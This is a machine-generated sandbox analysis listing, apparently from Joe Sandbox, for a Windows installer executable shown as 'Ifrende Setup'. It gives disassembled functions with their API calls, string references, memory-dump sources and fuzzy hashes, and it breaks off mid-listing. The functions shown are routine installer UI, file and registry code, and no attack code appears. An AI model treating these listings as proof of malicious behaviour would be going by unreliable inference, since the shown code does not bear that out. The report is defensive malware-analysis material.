                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
                                • Instruction ID: 112ec8b08e22b9c6c3aeb56eb94a2e19ac2cef272eed527e1014fed5102c6f46
                                • Opcode Fuzzy Hash: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
                                • Instruction Fuzzy Hash: 33C13631E04219DBCF18CF68D8905EEBBB2BF98314F25866AD85677380D734A942CF95
                                Function 00404D32 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,000003F9), ref: 00404D49
                                • GetDlgItem.USER32(?,00000408), ref: 00404D56
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DA5
                                • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404DBC
                                • SetWindowLongA.USER32(?,000000FC,00405345), ref: 00404DD6
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DE8
                                • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DFC
                                • SendMessageA.USER32(?,00001109,00000002), ref: 00404E12
                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404E1E
                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404E2E
                                • DeleteObject.GDI32(00000110), ref: 00404E33
                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E5E
                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E6A
                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F04
                                • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404F34
                                  • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F48
                                • GetWindowLongA.USER32(?,000000F0), ref: 00404F76
                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F84
                                • ShowWindow.USER32(?,00000005), ref: 00404F94
                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040508F
                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050F4
                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405109
                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 0040512D
                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040514D
                                • ImageList_Destroy.COMCTL32(?), ref: 00405162
                                • GlobalFree.KERNEL32(?), ref: 00405172
                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051EB
                                • SendMessageA.USER32(?,00001102,?,?), ref: 00405294
                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004052A3
                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004052CE
                                • ShowWindow.USER32(?,00000000), ref: 0040531C
                                • GetDlgItem.USER32(?,000003FE), ref: 00405327
                                • ShowWindow.USER32(00000000), ref: 0040532E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                • String ID: $M$N
                                • API String ID: 2564846305-813528018
                                • Opcode ID: ad365de84642ecf9d5d1417fba7f9e12be9bda6c8d0ac92067bf52711ca0feab
                                • Instruction ID: b1cb089e499fd84ad02b8b6dcb50706d58213328e80d7969948961eab3192630
                                • Opcode Fuzzy Hash: ad365de84642ecf9d5d1417fba7f9e12be9bda6c8d0ac92067bf52711ca0feab
                                • Instruction Fuzzy Hash: B1027DB0A00609AFDF209F94DD45AAE7BB5FB44354F50817AFA10BA2E1C7789D42CF58
                                Function 00404498 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202windowstringCOMMON
                                Download Yara Rule
                                APIs
                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404523
                                • GetDlgItem.USER32(00000000,000003E8), ref: 00404537
                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404555
                                • GetSysColor.USER32(?), ref: 00404566
                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404575
                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404584
                                • lstrlenA.KERNEL32(?), ref: 00404587
                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404596
                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004045AB
                                • GetDlgItem.USER32(?,0000040A), ref: 0040460D
                                • SendMessageA.USER32(00000000), ref: 00404610
                                • GetDlgItem.USER32(?,000003E8), ref: 0040463B
                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040467B
                                • LoadCursorA.USER32(00000000,00007F02), ref: 0040468A
                                • SetCursor.USER32(00000000), ref: 00404693
                                • LoadCursorA.USER32(00000000,00007F00), ref: 004046A9
                                • SetCursor.USER32(00000000), ref: 004046AC
                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 004046D8
                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 004046EC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                • String ID: N$Remove folder: $cD@
                                • API String ID: 3103080414-2623635553
                                • Opcode ID: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                • Instruction ID: 43684ccacc2d8fb7b4e0a1eb44f66cc69a0b9750f41782283b4d1566cbdab7d9
                                • Opcode Fuzzy Hash: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                • Instruction Fuzzy Hash: 106193B1A00209BBDB109F61DD45F6A3BA9FB84754F10443AFB057B1D1C7B8A951CF98
                                Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                Download Yara Rule
                                APIs
                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                • BeginPaint.USER32(?,?), ref: 00401047
                                • GetClientRect.USER32(?,?), ref: 0040105B
                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                • DeleteObject.GDI32(?), ref: 004010ED
                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                • DrawTextA.USER32(00000000,Ifrende Setup,000000FF,00000010,00000820), ref: 00401156
                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                • DeleteObject.GDI32(?), ref: 00401165
                                • EndPaint.USER32(?,?), ref: 0040116E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                • String ID: F$Ifrende Setup
                                • API String ID: 941294808-3140563244
                                • Opcode ID: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                • Instruction ID: 3ddd31971ff36fa992edb7b0d2f538087f25d398410520a6441e316a3758f4e4
                                • Opcode Fuzzy Hash: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                • Instruction Fuzzy Hash: 2E419C71800209AFCB059F95CE459BFBBB9FF44314F00842EF591AA1A0CB349955DFA4
                                Function 00405EF6 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406087,?,?), ref: 00405F27
                                • GetShortPathNameA.KERNEL32(?,0042C218,00000400), ref: 00405F30
                                  • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                  • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                • GetShortPathNameA.KERNEL32(?,0042C618,00000400), ref: 00405F4D
                                • wsprintfA.USER32 ref: 00405F6B
                                • GetFileSize.KERNEL32(00000000,00000000,0042C618,C0000000,00000004,0042C618,?,?,?,?,?), ref: 00405FA6
                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FB5
                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FED
                                • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042BE18,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00406043
                                • GlobalFree.KERNEL32(00000000), ref: 00406054
                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040605B
                                  • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\MPkM9Dd99B.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                  • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                • String ID: %s=%s$[Rename]
                                • API String ID: 2171350718-1727408572
                                • Opcode ID: 3ee2702b906f9f9870be181a98f9c6ca9cabf97a2df393811b734ddb71ed24d1
                                • Instruction ID: da8ce3bfdf00fcfed17b5edaf8d9799a0bf0ff3a482d4f6cc2fc7d52a36fe9c3
                                • Opcode Fuzzy Hash: 3ee2702b906f9f9870be181a98f9c6ca9cabf97a2df393811b734ddb71ed24d1
                                • Instruction Fuzzy Hash: 3D3135312407117BC220AB65AC88F6B3A5CDF41758F16003BFA02F72D2DE7C98558ABD
                                Function 00406587 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                • CharNextA.USER32(0000000C,*?|<>/":,00000000,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                • CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                • CharNextA.USER32(0000000C,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                • CharPrevA.USER32(0000000C,0000000C,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406588
                                • "C:\Users\user\Desktop\MPkM9Dd99B.exe", xrefs: 00406587
                                • *?|<>/":, xrefs: 004065CF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Char$Next$Prev
                                • String ID: "C:\Users\user\Desktop\MPkM9Dd99B.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                • API String ID: 589700163-954109453
                                • Opcode ID: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                • Instruction ID: 9f335943bb0e62a209881404c60ffb6aa99012b8199ff17f999404b9432e9d26
                                • Opcode Fuzzy Hash: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                • Instruction Fuzzy Hash: 871104618053923DFB3216282C44B777F894F97760F1A007FE5C2722C6CA7C5C62966D
                                Function 00404394 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                Download Yara Rule
                                APIs
                                • GetWindowLongA.USER32(?,000000EB), ref: 004043B1
                                • GetSysColor.USER32(00000000), ref: 004043EF
                                • SetTextColor.GDI32(?,00000000), ref: 004043FB
                                • SetBkMode.GDI32(?,?), ref: 00404407
                                • GetSysColor.USER32(?), ref: 0040441A
                                • SetBkColor.GDI32(?,?), ref: 0040442A
                                • DeleteObject.GDI32(?), ref: 00404444
                                • CreateBrushIndirect.GDI32(?), ref: 0040444E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                • String ID:
                                • API String ID: 2320649405-0
                                • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                • Instruction ID: 0cb6da092899fbd89936ee00678fc1211e2f1892718b1dfe439ae8b372ce6297
                                • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                • Instruction Fuzzy Hash: E32177715007049BCF309F78D948B577BF8AF81714B04893DEAA6B26E1C734E948CB58
                                Function 00404C80 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C9B
                                • GetMessagePos.USER32 ref: 00404CA3
                                • ScreenToClient.USER32(?,?), ref: 00404CBD
                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404CCF
                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CF5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Message$Send$ClientScreen
                                • String ID: f
                                • API String ID: 41195575-1993550816
                                • Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                • Instruction ID: 8ac1eb656b69e247d5f05692bef4687e0c0d70a1275d834663b2b8f38aac2a1a
                                • Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                • Instruction Fuzzy Hash: B6019E71900218BAEB00DB94DD81FFFBBBCAF44711F10012BBA01B61C0C7B899418BA4
                                Function 00401E5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(?), ref: 00401E5D
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                                • ReleaseDC.USER32(?,00000000), ref: 00401E90
                                • CreateFontIndirectA.GDI32(0040B830), ref: 00401EDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CapsCreateDeviceFontIndirectRelease
                                • String ID: Times New Roman
                                • API String ID: 3808545654-927190056
                                • Opcode ID: 3ab25366fc8e8bfe16e2d28a3ebe65f723501a18dd55c5dc8e8496ebd1575ba0
                                • Instruction ID: 3235dfa2473664f3223cdf9cba53c0ab50ba273bd9661b34cbd5463b8b999ac8
                                • Opcode Fuzzy Hash: 3ab25366fc8e8bfe16e2d28a3ebe65f723501a18dd55c5dc8e8496ebd1575ba0
                                • Instruction Fuzzy Hash: FE017572504344AFE7107B60AE49B9E3FF8E715701F10897AF181B62F2CB7800058B6D
                                Function 00402E4A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                Download Yara Rule
                                APIs
                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E65
                                • MulDiv.KERNEL32(001499AA,00000064,0014A4B8), ref: 00402E90
                                • wsprintfA.USER32 ref: 00402EA0
                                • SetWindowTextA.USER32(?,?), ref: 00402EB0
                                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2
                                Strings
                                • verifying installer: %d%%, xrefs: 00402E9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Text$ItemTimerWindowwsprintf
                                • String ID: verifying installer: %d%%
                                • API String ID: 1451636040-82062127
                                • Opcode ID: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                • Instruction ID: 08bf30aeaad7c3c0f985f8b81484beb4ade113f1463dbf8d033ac048ea6a4a00
                                • Opcode Fuzzy Hash: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                • Instruction Fuzzy Hash: EF016270640208FBEF209F60DE09EEE3769AB10304F008039FA06B51E1DBB89D56CF99
                                Function 0040280D Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040286E
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040288A
                                • GlobalFree.KERNEL32(?), ref: 004028C9
                                • GlobalFree.KERNEL32(00000000), ref: 004028DC
                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028F8
                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040290B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                • String ID:
                                • API String ID: 2667972263-0
                                • Opcode ID: f2f5004db618060fe317ee0d1003544e1a2fa323f5e59acd3a511c365c814511
                                • Instruction ID: f5f6ffd272893f167dd8362f30c9a288e23aa0477cfe19fc00766ec7197ba147
                                • Opcode Fuzzy Hash: f2f5004db618060fe317ee0d1003544e1a2fa323f5e59acd3a511c365c814511
                                • Instruction Fuzzy Hash: EA319E32C00124BBEF216FA5CE48D9E7A79EF04364F10823AF554B72E1CB7949419FA8
                                Function 00402D60 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
